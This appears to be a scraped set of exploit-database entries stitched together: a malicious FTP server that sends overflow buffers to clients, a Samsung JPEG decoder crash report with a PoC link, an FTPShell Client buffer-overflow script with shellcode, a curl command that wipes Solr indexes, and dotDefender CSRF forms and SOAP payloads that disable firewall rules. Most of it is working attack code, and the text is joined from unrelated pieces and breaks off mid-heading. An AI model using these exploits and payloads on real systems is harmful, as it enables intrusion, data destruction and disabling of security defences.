m4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M"


class FTPserverThread(threading.Thread):
    def __init__(self,(conn,addr)):
        self.conn=conn
        self.addr=addr
        self.basewd=currdir
        self.cwd=self.basewd
        self.rest=False
        self.pasv_mode=False
        threading.Thread.__init__(self)

    def run(self):
        self.conn.send('220 Welcome!\r\n')
        while True:
            cmd=self.conn.recv(256)
            if not cmd: break
            else:
                print 'Recieved:',cmd
                try:
                    func=getattr(self,cmd[:4].strip().upper())
                    func(cmd)
                except Exception,e:
                    print 'ERROR:',e
                    #traceback.print_exc()
                    self.conn.send('500 Sorry.\r\n')

    def SYST(self,cmd):
        self.conn.send('215 UNIX Type: L8\r\n')
    def OPTS(self,cmd):
        if cmd[5:-2].upper()=='UTF8 ON':
            self.conn.send('200 OK.\r\n')
        else:
            self.conn.send('451 Sorry.\r\n')
    def USER(self,cmd):
        self.conn.send('331 OK.\r\n')
    def PASS(self,cmd):
        self.conn.send('230 OK.\r\n')
        #self.conn.send('530 Incorrect.\r\n')
    def QUIT(self,cmd):
        self.conn.send('221 Goodbye.\r\n')
    def NOOP(self,cmd):
        self.conn.send('200 OK.\r\n')
    def TYPE(self,cmd):
        self.mode=cmd[5]
        self.conn.send('200 Binary mode.\r\n')

    def CDUP(self,cmd):
        if not os.path.samefile(self.cwd,self.basewd):
            #learn from stackoverflow
            self.cwd=os.path.abspath(os.path.join(self.cwd,'..'))
        self.conn.send('200 OK.\r\n')
    def PWD(self,cmd):
        cwd=os.path.relpath(self.cwd,self.basewd)
        if cwd=='.':
            cwd='/'
        else:
            cwd='/'+cwd
        self.conn.send('257 \"%s\"\r\n' % cwd)
    def CWD(self,cmd):
        chwd=cmd[4:-2]
        if chwd=='/':
            self.cwd=self.basewd
        elif chwd[0]=='/':
            self.cwd=os.path.join(self.basewd,chwd[1:])
        else:
            self.cwd=os.path.join(self.cwd,chwd)
        self.conn.send('250 OK.\r\n')

    def PORT(self,cmd):
        if self.pasv_mode:
            self.servsock.close()
            self.pasv_mode = False
        l=cmd[5:].split(',')
        self.dataAddr='.'.join(l[:4])
        self.dataPort=(int(l[4])<<8)+int(l[5])
        self.conn.send('200 Get port.\r\n')

    def PASV(self,cmd): # from http://goo.gl/3if2U
        self.pasv_mode = True
        self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.servsock.bind((local_ip,0))
        self.servsock.listen(1)
        ip, port = self.servsock.getsockname()
        print 'open', ip, port
        self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
                (','.join(ip.split('.')), port>>8&0xFF, port&0xFF))

    def start_datasock(self):
        if self.pasv_mode:
            self.datasock, addr = self.servsock.accept()
            print 'connect:', addr
        else:
            self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            self.datasock.connect((self.dataAddr,self.dataPort))

    def stop_datasock(self):
        self.datasock.close()
        if self.pasv_mode:
            self.servsock.close()


    def LIST(self,cmd):
        self.conn.send('150 Here comes the directory listing.\r\n')
        self.start_datasock()
        for t in os.listdir(self.cwd):
            k=self.toListItem(os.path.join(self.cwd,t))
            self.datasock.send(buff + buff + buff + '\r\n')
            print "[+] Crafted packet sent . . . [+]"            
            #self.datasock.send(buff + buff + '\r\n')
        self.stop_datasock()
        self.conn.send('226 Directory send OK.\r\n')

    def toListItem(self,fn):
        st=os.stat(fn)
        fullmode='rwxrwxrwx'
        mode=''
        for i in range(9):
            mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
        d=(os.path.isdir(fn)) and 'd' or '-'
        ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
        return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)

    def MKD(self,cmd):
        dn=os.path.join(self.cwd,cmd[4:-2])
        os.mkdir(dn)
        self.conn.send('257 Directory created.\r\n')

    def RMD(self,cmd):
        dn=os.path.join(self.cwd,cmd[4:-2])
        if allow_delete:
            os.rmdir(dn)
            self.conn.send('250 Directory deleted.\r\n')
        else:
            self.conn.send('450 Not allowed.\r\n')

    def DELE(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        if allow_delete:
            os.remove(fn)
            self.conn.send('250 File deleted.\r\n')
        else:
            self.conn.send('450 Not allowed.\r\n')

    def RNFR(self,cmd):
        self.rnfn=os.path.join(self.cwd,cmd[5:-2])
        self.conn.send('350 Ready.\r\n')

    def RNTO(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        os.rename(self.rnfn,fn)
        self.conn.send('250 File renamed.\r\n')

    def REST(self,cmd):
        self.pos=int(cmd[5:-2])
        self.rest=True
        self.conn.send('250 File position reseted.\r\n')

    def RETR(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
        print 'Downlowding:',fn
        if self.mode=='I':
            fi=open(fn,'rb')
        else:
            fi=open(fn,'r')
        self.conn.send('150 Opening data connection.\r\n')
        if self.rest:
            fi.seek(self.pos)
            self.rest=False
        data= fi.read(1024)
        self.start_datasock()
        while data:
            self.datasock.send(data)
            data=fi.read(1024)
        fi.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')

    def STOR(self,cmd):
        fn=os.path.join(self.cwd,cmd[5:-2])
        print 'Uplaoding:',fn
        if self.mode=='I':
            fo=open(fn,'wb')
        else:
            fo=open(fn,'w')
        self.conn.send('150 Opening data connection.\r\n')
        self.start_datasock()
        while True:
            data=self.datasock.recv(1024)
            if not data: break
            fo.write(data)
        fo.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')

class FTPserver(threading.Thread):
    def __init__(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((local_ip,local_port))
        threading.Thread.__init__(self)

    def run(self):
        self.sock.listen(5)
        while True:
            th=FTPserverThread(self.sock.accept())
            th.daemon=True
            th.start()

    def stop(self):
        self.sock.close()

if __name__=='__main__':
    ftp=FTPserver()
    ftp.daemon=True
    ftp.start()
    print 'On', local_ip, ':', local_port
    raw_input('Enter to end...\n')
    ftp.stop()
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=617

The attached jpg causes an invalid pointer to be freed when media scanning occurs.

F/libc    (11192): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xffffffffffffb0 in tid 14368 (HEAVY#7)
I/DEBUG   ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG   ( 3021): Revision: '10'
I/DEBUG   ( 3021): ABI: 'arm64'
I/DEBUG   ( 3021): pid: 11192, tid: 14368, name: HEAVY#7  >>> com.samsung.dcm:DCMService <<<
I/DEBUG   ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xffffffffffffb0
I/DEBUG   ( 3021):     x0   0000000000000002  x1   0000007f89fa9758  x2   00000000003fffff  x3   0000000000000000
I/DEBUG   ( 3021):     x4   0000000000000000  x5   0000007f89f98000  x6   0000007f89fa9790  x7   0000000000000006
I/DEBUG   ( 3021):     x8   fffffffffffffffa  x9   ffffffffffffffee  x10  ffffffffffffff70  x11  0000007f7f000bb8
I/DEBUG   ( 3021):     x12  0000000000000014  x13  0000007f89f98000  x14  0000007f89fa5000  x15  0000004000000000
I/DEBUG   ( 3021):     x16  0000007f7eed6ba0  x17  0000007f89ef38fc  x18  0000007f89fa9830  x19  0000000000000002
I/DEBUG   ( 3021):     x20  000000000000001f  x21  0000007f89f98000  x22  00000000ffffffff  x23  0000007f7f0647f8
I/DEBUG   ( 3021):     x24  0000007f71809b10  x25  0000000000000010  x26  0000000000000080  x27  fffffffffffffffc
I/DEBUG   ( 3021):     x28  0000007f7edf9dd0  x29  0000007f7edf9b50  x30  0000007f89ef3914
I/DEBUG   ( 3021):     sp   0000007f7edf9b50  pc   0000007f89f53b24  pstate 0000000020000000
I/DEBUG   ( 3021): 
I/DEBUG   ( 3021): backtrace:
I/DEBUG   ( 3021):     #00 pc 0000000000079b24  /system/lib64/libc.so (je_free+92)
I/DEBUG   ( 3021):     #01 pc 0000000000019910  /system/lib64/libc.so (free+20)
I/DEBUG   ( 3021):     #02 pc 000000000003f8cc  /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+916)
I/DEBUG   ( 3021):     #03 pc 0000000000043890  /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2852)
I/DEBUG   ( 3021):     #04 pc 00000000000439b4  /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG   ( 3021):     #05 pc 0000000000043af0  /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+284)
I/DEBUG   ( 3021):     #06 pc 0000000000045ddc  /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+440)
I/DEBUG   ( 3021):     #07 pc 00000000000a24c0  /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG   ( 3021):     #08 pc 0000000000001b98  /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG   ( 3021):     #09 pc 0000000000001418  /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)

To reproduce, download the image file and wait, or trigger media scanning by calling:

adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39424.zip
HireHackking 
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content 
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#77FAB277  JMP ESP
# Windows Xp Professional Version 2002 Service Pack 3
eip = "\x77\xB2\xFA\x77"
# Nops
nops = "\x90"*100
# Shellcode Calc.exe 16Byte
buf=("\x31\xC9"
"\x51"    
"\x68\x63\x61\x6C\x63"    
"\x54"    
"\xB8\xC7\x93\xC2\x77"    
"\xFF\xD0")

#Appending Buffers Together
exploit = junk + eip + nops + buf
#Creating File
length = len(exploit)
print "[+]File name:     [%s]\n" % filename
print "[+]Payload Size: [%s]\n " % length 
print "[+]File Created.\n" 
file = open(filename,"w")
file.write(exploit)
file.close
print exploit


#[+] Very Special Tnx To My Best Friends: TheNonexistent,Nirex,Pr0t3ctor
HireHackking 
# Exploit Title: All Solr Data Can Be Delete
# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser]
[Statistics] [Info] [Distribution] [Ping] [Logging]
# Date: 5/2/2016
# Exploit Author: N37 [Myanmar]
# Vendor Homepage: http://lucene.apache.org/solr/
# Software Link:  https://archive.apache.org/dist/lucene/solr/3.5.0/
# Version: 3.5.0
# Tested on: fedora 23


Solr is  open source enterprise search platform built on Apache Lucene.

It can be delete all data in solr. solr are use nlp, money of data research, data mining,  some of mobile backend on vps .


POC or Eg.

This Query is shwo all data in solr :
http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on

You can delete all data with curl in terminal :
curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true"

now you can check with first query in browser. All data are deleted.


Regards,
N37 [Myanmar]
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt


Vendor:
==================
www.applicure.com


Product:
=====================
dotDefender Firewall
Versions: 5.00.12865 / 5.13-13282


dotDefender is a Web application firewall (WAF) for preventing hacking
attacks like XSS, SQL Injections, CSRF etc...
that provides Apache and IIS Server Security across Dedicated, VPS and
Cloud environments. It meets PCI Compliance and also
provides E-Commerce Security, IIS and Apache Security, Cloud Security and
more.


Vulnerability Type:
=================================
Cross Site Request Forgery - CSRF


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
Dotdefender firewall (WAF) is vulnerable to cross site request forgery,
this allows attackers to make HTTP requests via the victims browser to
the dotdefender management server on behalf of the victim if the victim is
logged in and visits a malicious web page or clicks an infected link.
Result can be modifying or disabling various firewall patterns,
User-Defined Rule settings and global event logging etc...


HTTP requests sent to Dotdefender to enable or disable user-Defined rule
settings are base64 encoded using SOAP protocol.
Sending the below base64 value for example disables a Dotdefender firewall
setting.

PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>


Tested successfully on Windows & Linux:

dotDefender Version:          5.00.12865
Web Server Type:              Microsoft-IIS
Server Operating System:      Windows
Web Server Version:           7.5
Firefox web browser


dotDefender Version:     5.13-13282
Web Server Type:     Apache
Server Operating System:     Linux


Exploit code(s):
===============

Example to send requests to disable firewall rule settings that defends
against SQL injection.
We need to send two requests first to modify the desired settings and
second to commit our changes.


HTTP request 0x01 - send following soap request to disable SQL Injection
request firewall rule
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~

<IFRAME style="display:none" name="demonica"></IFRAME>

<form target="demonica" id="SACRIFICIAL" action="
http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
 method="post" onsubmit="TORMENT()">
<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <soapenv:Body xmlns:ns1="http://applicure.com/dotDefender">
 <ns1:set_xpath><site xsi:type="xsd:string">0</site>
 <xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=1]/enabled</xpath>
 <xml xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml>
 </ns1:set_xpath></soapenv:Body></soapenv:Envelope>'>
<script>document.getElementById('SACRIFICIAL').submit()</script>
</form>


HTTP request 0x02 - send the next request to commit the changes
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~

<form target="demonica" id="VICTIM" action="
http://localhost/dotDefender/dotDefenderWS.exe" ENCTYPE="text/plain"
 method="post">
<input type="hidden" name='<soapenv:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema"
 xmlns:ZSI="http://www.zolera.com/schemas/ZSI/"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
 soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:commit>
 <sites><element0 id="0" xsi:type="xsd:string">0</element0></sites>
 </ns1:commit></soapenv:Body></soapenv:Envelope>'>
<script>function
TORMENT(){document.getElementById('VICTIM').submit()}</script>
</form>



Other SOAP payload examples for rule disabling:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=

this is disable a rule #19, send the below request to disable remote IP
protections:

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ZSI="
http://www.zolera.com/schemas/ZSI/"
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="
http://schemas.xmlsoap.org/soap/encoding/"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Body xmlns:ns1="http://applicure.com/dotDefender"><ns1:set_xpath><site
xsi:type="xsd:string">0</site>
<xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=19]/enabled</xpath>
<xml
xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>


disable rule 20:
~=~=~=~=~=~=~=~=

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
xmlns:ns1="http://applicure.com/dotDefender">
<ns1:set_xpath><site xsi:type="xsd:string">0</site><xpath
xsi:type="xsd:string">/ud_rules/request_rules/request_rule[rule_id=20]/enabled</xpath>
<xml
xsi:type="xsd:base64Binary">PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+</xml></ns1:set_xpath></soapenv:Body></soapenv:Envelope>


Finally commit them with below request:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/" xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soapenv:Body
xmlns:ns1="http://applicure.com/dotDefender">
<ns1:commit><sites><element0 id="0"
xsi:type="xsd:string">0</element0></sites></ns1:commit></soapenv:Body></soapenv:Envelope>




Disclosure Timeline:
================================
Vendor Notifications:

initial report 11/16/2015
vendor response 11/20/2015
vendor delays for two months
1/19/2016 Vendor finally acknowledges vulnerability
inform vendor of a disclosure date
vendor no longer responds
Feb 8, 2016 : Public Disclosure


Exploitation Technique:
